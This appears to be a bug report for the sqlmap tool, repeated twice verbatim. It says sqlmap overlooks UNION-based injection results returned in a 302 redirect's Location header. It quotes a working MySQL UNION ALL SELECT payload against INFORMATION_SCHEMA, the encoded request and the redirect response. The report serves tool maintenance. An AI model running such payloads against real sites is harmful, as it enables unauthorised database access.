Describe the bug
sqlmap cannot get data from part of Location header when using UNION method
Part of log:
[PAYLOAD] -7521 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a7171,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x7171717171) FROM INFORMATION_SCHEMA.SCHEMATA-- -
[TRAFFIC OUT] HTTP request:
GET ...-7521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716b6a7171%2CIFNULL%28CAST%28COUNT%28schema_name%29%20AS%20NCHAR%29%2C0x20%29%2C0x7171717171%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20- HTTP/1.1
Host: ...
Referer: ...
Accept-encoding: gzip,deflate
Cache-control: no-cache
Accept: /
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)
Connection: close
[TRAFFIC IN] HTTP redirect (302 Found):
Content-length: 0
X-powered-by: ...
Set-cookie: ...
Expires: ...
Server: ...
Connection: close
Location: .../qkjqq5qqqqq
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: ...
Content-type: text/html; charset=UTF-8
[WARNING] the SQL query provided does not return any output
As you can see from this part of the log, there is a Location header in the response from the server. It contains "qkjqq5qqqqq" part, which is the answer to our request. However, sqlmap does not see it and warning "the SQL query provided does not return any output"
Describe the bug
sqlmap cannot get data from part of Location header when using UNION method
Part of log:
[PAYLOAD] -7521 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a7171,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x7171717171) FROM INFORMATION_SCHEMA.SCHEMATA-- -
[TRAFFIC OUT] HTTP request:
GET ...-7521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716b6a7171%2CIFNULL%28CAST%28COUNT%28schema_name%29%20AS%20NCHAR%29%2C0x20%29%2C0x7171717171%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20- HTTP/1.1
Host: ...
Referer: ...
Accept-encoding: gzip,deflate
Cache-control: no-cache
Accept: /
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)
Connection: close
[TRAFFIC IN] HTTP redirect (302 Found):
Content-length: 0
X-powered-by: ...
Set-cookie: ...
Expires: ...
Server: ...
Connection: close
Location: .../qkjqq5qqqqq
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: ...
Content-type: text/html; charset=UTF-8
[WARNING] the SQL query provided does not return any output
As you can see from this part of the log, there is a Location header in the response from the server. It contains "qkjqq5qqqqq" part, which is the answer to our request. However, sqlmap does not see it and warning "the SQL query provided does not return any output"